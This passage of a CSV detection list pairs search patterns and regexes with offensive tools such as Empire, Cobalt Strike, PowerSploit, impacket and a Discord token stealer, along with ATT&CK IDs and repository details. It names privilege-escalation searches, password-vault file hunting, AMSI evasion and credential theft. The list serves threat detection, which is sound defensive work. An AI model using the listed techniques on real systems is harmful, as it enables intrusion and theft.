-print*",".{0,1000}find\s\/\s.{0,1000}\s\-perm\s\-2000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*find / * -regextype egrep -iregex*\.kdbx*",".{0,1000}find\s\/\s.{0,1000}\s\-regextype\segrep\s\-iregex.{0,1000}\\\.kdbx.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*find_and_load_coerce_methods*",".{0,1000}find_and_load_coerce_methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*find_domain.sh *",".{0,1000}find_domain\.sh\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*find_payload(*",".{0,1000}find_payload\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*Find-4624Logons*",".{0,1000}Find\-4624Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-4648Logons*",".{0,1000}Find\-4648Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-ADInterestingACL *",".{0,1000}Find\-ADInterestingACL\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Find-ADInterestingACL.ps1*",".{0,1000}Find\-ADInterestingACL\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*FindAdminAccessComputers*",".{0,1000}FindAdminAccessComputers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Find-AdminLogonScripts.ps1*",".{0,1000}Find\-AdminLogonScripts\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*findall(r""dQw4w9WgXcQ*",".{0,1000}findall\(r\""dQw4w9WgXcQ.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*find-allvulns*",".{0,1000}find\-allvulns.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Find-AmsiAstSignatures -*",".{0,1000}Find\-AmsiAstSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiPSTokenSignatures -*",".{0,1000}Find\-AmsiPSTokenSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiSignatures.ps1*",".{0,1000}Find\-AmsiSignatures\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AppLockerLogs*",".{0,1000}Find\-AppLockerLogs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-AVSignature*",".{0,1000}Find\-AVSignature.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-BadPrivilege.json*",".{0,1000}Find\-BadPrivilege\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-BadPrivileges-DomainComputers.ps1*",".{0,1000}Find\-BadPrivileges\-DomainComputers\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-ComputersWithRemoteAccessPolicies.json*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-ComputersWithRemoteAccessPolicies.ps1*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-DangerousACLPermissions*",".{0,1000}Find\-DangerousACLPermissions.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*findDelegation.py -dc-ip *",".{0,1000}findDelegation\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*findDelegation.py*",".{0,1000}findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Find-DomainShare -*",".{0,1000}Find\-DomainShare\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-DomainShare -CheckShareAccess*",".{0,1000}Find\-DomainShare\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-FileWMImplant*",".{0,1000}Find\-FileWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Find-Fruit.*",".{0,1000}Find\-Fruit\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-Fruit.ps1*",".{0,1000}Find\-Fruit\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findgpocomputeradmin*",".{0,1000}findgpocomputeradmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-InsecureResourceDelegations*",".{0,1000}Find\-InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 